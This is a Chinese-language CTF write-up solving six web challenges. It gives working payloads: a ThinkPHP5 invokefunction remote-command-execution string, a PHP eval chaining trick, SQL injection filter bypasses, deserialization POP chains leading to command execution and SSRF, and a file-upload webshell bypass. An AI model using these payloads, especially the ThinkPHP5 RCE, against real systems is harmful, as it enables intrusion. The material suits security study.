目录
①webdog1__start
②ez_rce
③ez_sql
④ez_1zpop
⑤file_maste
⑥Power!
挑了部分题,太简单的就没选进来(但选进来≠有难度)
①webdog1__start
进来没啥东西,右键查看源码
对于0e215962017,md5后也是以0e开头
?web=0e215962017
跳转到/start.php
没啥信息,这里bp抓包看响应头发现hint
访问/f14g.php
继续抓包发现hint(意义何在????)
访问/F1l1l1l1l1lag.php
/F1l1l1l1l1lag.php?get=system('ls');
因为有长度限制,所以我们尝试转接
/F1l1l1l1l1lag.php?get=eval($_GET[1]);&1=system('tac flag.php');
回显
就是说flag在/flag里呗
/F1l1l1l1l1lag.php?get=eval($_GET[1]);&1=system('tac /flag');
拿到flag
②ez_rce
进来先灵魂发问
懒得扫目录了,直接访问/robots.txt
访问/NSS/index.php/
惊了!!是TP5!!
直接检索thinkphp5 漏洞原理分析合集
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /flag/flag
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag/flag
均无回显
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=printenv
看环境变量
确定flag不在该文件下了
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag*
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /nss/ctf/flag/flag /flag /flag
拿到flag
或者其实这类框架漏洞利用的题都是有相应工具能梭的()
③ez_sql
提示用post传参
简单测了一下过滤了空格,注释符绕过,union,or,and,双写绕过即可
nss=1'/**/oorrder/**/by/**/4#
nss=999'/**/ununionion/**/select/**/1,2,3#
999'/**/ununionion/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),3#
999'/**/ununionion/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aandnd/**/table_name='NSS_tb'),3#
999'/**/ununionion/**/select/**/1,(select/**/group_concat(Secr3t,flll444g)/**/from/**/NSS_tb),3#
④ez_1zpop
<?php
error_reporting(0);
class dxg
{function fmm(){return "nonono";}
}class lt
{public $impo='hi';public $md51='weclome';public $md52='to NSS';function __construct(){$this->impo = new dxg;}function __wakeup(){$this->impo = new dxg;return $this->impo->fmm();}function __toString(){if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)return $this->impo->fmm();}function __destruct(){echo $this;}
}class fin
{public $a;public $url = 'https://www.ctfer.vip';public $title;function fmm(){$b = $this->a;$b($this->title);}
}if (isset($_GET['NSS'])) {$Data = unserialize($_GET['NSS']);
} else {highlight_file(__file__);
}
这个甚至不用搓链子,只要绕过一个wake_up就可以
(echo $this可以直接触发__toString)
构造
$b=new fin();
$a=new lt();
$a->impo=$b;
$b->a='system';
$b->title='tac /flag';
$a->md51='s878926199a';
$a->md52='s155964671a';
echo serialize($a);
最终payload:
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"tac /flag";}s:4:"md51";s:11:"s878926199a";s:4:"md52";s:11:"s155964671a";}
⑤file_master
进来页面可以读文件可以传文件
?filename=index.php看源码
MIME检测,文件头检测,文件内容检测
改Content-Type: image/jpeg
文件头
#define height 1
#define width 1
php用短标签即可
访问 /upload/hggmm3ekc10fc6arlp5d03oamr/yjh3.php
下略
⑥Power!
右键查看源码发现提示
?source=index.php
看index.php源码
<?phpclass FileViewer{public $black_list = "flag";public $local = "http://127.0.0.1/";public $path;public function __call($f,$a){$this->loadfile();}public function loadfile(){if(!is_array($this->path)){if(preg_match("/".$this->black_list."/i",$this->path)){$file = $this->curl($this->local."cheems.jpg");}else{$file = $this->curl($this->local.$this->path);}}else{$file = $this->curl($this->local."cheems.jpg");}echo '<img src="data:jpg;base64,'.base64_encode($file).'"/>';}public function curl($path){$url = $path;$curl = curl_init();curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_HEADER, 0);$response = curl_exec($curl);curl_close($curl);return $response;}public function __wakeup(){$this->local = "http://127.0.0.1/";}}class Backdoor{public $a;public $b;public $superhacker = "hacker.jpg";public function goodman($i,$j){$i->$j = $this->superhacker;}public function __destruct(){$this->goodman($this->a,$this->b);$this->a->c();}}if(isset($_GET['source'])){highlight_file(__FILE__);}else{if(isset($_GET['image_path'])){$path = $_GET['image_path']; //flag in /flag.phpif(is_string($path)&&!preg_match("/http:|gopher:|glob:|php:/i",$path)){echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';}else{echo '<h2>Seriously??</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents("cheems.jpg")).'"/>';}}else if(isset($_GET['path_info'])){$path_info = $_GET['path_info'];$FV = unserialize(base64_decode($path_info));$FV->loadfile();}else{$path = "vergil.jpg";echo '<h2>POWER!!</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';}}
?>
?image_path=flag.php
点开echo的链接
flag被放在了 127.0.0.1:65500 ,外网无法访问
看来要用SSRF了
搓链子
FileViewer -> Backdoor::__destruct() -> FileViewer::__call() -> FileViewer::loadfile() -> FileViewer::curl()
注意程序在 unserialize 之后会调用 $FV->loadfile();, 如果 $FV 不是 FileViewer 类的实例则会抛出异常, 导致 Backdoor 类的 __destruct 不会成功执行
解决方法就是再实例化一个 FileViewer 对象 将 Backdoor 塞进这个对象的某个属性里 (php 可以反序列化出不存在的属性)
构造
<?php
class FileViewer{public $local = "http://127.0.0.1:65500/";public $path = '';
}class Backdoor{public $a;public $b;public $superhacker;
}$y = new FileViewer();
$x = new Backdoor();
$x->a = $y;
$x->b = 'local';
$x->superhacker = 'http://127.0.0.1:65500/';
$z = new FileViewer();
$z->test = $x;
echo base64_encode(serialize($z));
payload:
?path_info=TzoxMDoiRmlsZVZpZXdlciI6Mzp7czo1OiJsb2NhbCI7czoyMzoiaHR0cDovLzEyNy4wLjAuMTo2NTUwMC8iO3M6NDoicGF0aCI7czowOiIiO3M6NDoidGVzdCI7Tzo4OiJCYWNrZG9vciI6Mzp7czoxOiJhIjtPOjEwOiJGaWxlVmlld2VyIjoyOntzOjU6ImxvY2FsIjtzOjIzOiJodHRwOi8vMTI3LjAuMC4xOjY1NTAwLyI7czo0OiJwYXRoIjtzOjA6IiI7fXM6MToiYiI7czo1OiJsb2NhbCI7czoxMToic3VwZXJoYWNrZXIiO3M6MjM6Imh0dHA6Ly8xMjcuMC4wLjE6NjU1MDAvIjt9fQ==